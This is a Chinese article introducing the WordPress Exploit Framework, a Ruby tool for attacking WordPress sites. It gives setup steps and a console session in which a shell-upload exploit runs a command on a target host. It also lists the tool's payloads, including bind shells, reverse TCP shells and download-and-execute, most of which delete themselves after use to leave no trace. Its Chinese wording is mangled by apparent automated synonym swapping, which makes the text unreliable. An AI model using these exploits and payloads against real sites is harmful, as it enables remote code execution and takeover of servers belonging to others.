用于浸透测验WordPress的Ruby结构:WordPress Exploit Framework
这个Ruby结构包括一些能够浸透测验WordPress网站和体系的模块,用户也能够自己开发模块扩展其功用。
运转它需求什么条件?
保证体系上装置了Ruby 2.2.x,翻开一个指令行窗口,切换当时目录到WPXF文件夹下,运转指令“bundle install”,假如你的体系上没有装置bundler,能够经过履行指令“gem install bundler”装置。
怎么运用它?
翻开一个指令行窗口,切换当时目录到你下载保存WordPress Exploit Framework的途径,履行指令“ruby wpxf.rb”就能够发动它。
wpxf一旦加载起来,会呈现一个wpxf提示符,你能够运用“search”指令来搜索模块,运用“use”指令来加载模块。
把模块加载到程序运转环境中后,能够运用“set”指令来设置选项参数,运用“info”指令检查模块相关的信息。
下面是一个比如,加载“symposium_shell_upload”缝隙运用模块,设置模块和载荷的参数,最终,履行这个缝隙运用模块进犯方针。
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
在github能够获得一切指令的列表。
辅佐模块和缝隙运用模块有什么区别?
辅佐模块并不能让你在方针机器上运转进犯载荷,可是能够解析方针的信息,提高权限或许供给拒绝服务的功用。
缝隙运用模块需求你指定一个进犯载荷,这将会在方针机器上履行,你能够在方针机上履行恣意代码提取信息,树立一个长途shell或许其他你想在Web服务器上做的工作。
有哪些可用的载荷?
bind_php:上传一个在特定端口监听的脚本,答应WPXF树立一个长途shell;
custom:上传并履行一个定制的PHP脚本;
download_exec:下载并运转一个长途可履行文件;
exec:在长途服务器上运转一个shell指令,并把成果返回到WPXF会话;
reverse_tcp:上传一个能够树立反连TCP shell的脚本;
除了“custom”,一切这些载荷都会在履行完之后删去自己,防止在运用之后或许树立shell衔接失利之后遗留在方针机器上。
怎么编写自己的模块和载荷?
编写模块和载荷的办法能够在Github找到,一切的API文档都在Getwpxf。
在github能够下载Wordpress-Exploit-Framework